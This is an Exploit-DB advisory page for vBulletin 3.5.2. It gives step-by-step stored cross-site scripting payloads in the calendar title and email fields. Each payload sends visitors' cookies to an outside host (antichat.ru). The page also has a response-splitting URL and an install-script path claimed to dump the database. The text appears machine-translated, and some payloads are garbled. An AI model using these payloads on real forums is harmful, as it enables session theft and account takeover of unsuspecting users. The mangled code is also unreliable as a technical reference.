vBulletin 3.5.2 - Cross-Site Scripting

EDB-ID:

11394

CVE:

N/A

EDB Verified:

Author:

ROOT_EGY

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2010-02-11

Vulnerable App: 
# Title: vBulletin Version 3.5.2 - Introduction XSS scripting
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 3.5.2

===============================================
              WWW.sec-war.com
===============================================

3.5.2 - Introduction XSS scripting
The vulnerability is in the field «title» scenario «calendar.php».
Example:
TITLE :---> Test <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document.cookie; </ script>
BODY :----> No matter
OTHER OPTIONS: -> No matter
That all went off to go to the calendar, create a new event in the header to prescribe <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document. cookie; </ script>, then go look at the link, which is our event and give to the show to someone who want to steal a cookie.
3.5.3 - Introduction XSS scripts in the field «Email Address» in the module «Edit Email & Password».
Example:

www.server.som/forumpath/profile.php?do=editpassword
pass: your pass
email: vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ document.cookie; </ script> . nomatt
Note About lenght limitation
****
forum / profile.php? do = editoptions
Receive Email from Other Members = yes
****
www.server.com/forumpath/sendmessage.php?do=mailmember&u = (your id)
In the email write vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ Document.cookie; </ script>. nomatt. Once preserved, it is important to make the option email visible to all. Then the helmet someone www.xhh777hhh.som/forumpath/sendmessage.php?do=mailmember&u = (your id) and get a cookie on our address sniffer.

3.5.4 - Dump database
The vulnerability is in the scripts directory upgrade_301.php 'install'.
Example: server.com/forumpath/install/upgrade_301.php?step=SomeWord

3.5.4 - Introduction XSS scripting
The vulnerability is in the url parameter scenario inlinemod.php.
Example: www.server.com/forumpath/inlinemod.php?do=clearthread&url=lala2% 0d% 0aContent-Length:% 2033% 0d% 0a% 0d% 0a <html> Hacked! </ Html>% 0d% 0a% 0d% 0a

===============================================

ROOT_EGY  to connect: r0t@hotmail.es

===============================================

Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.

===============================================
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services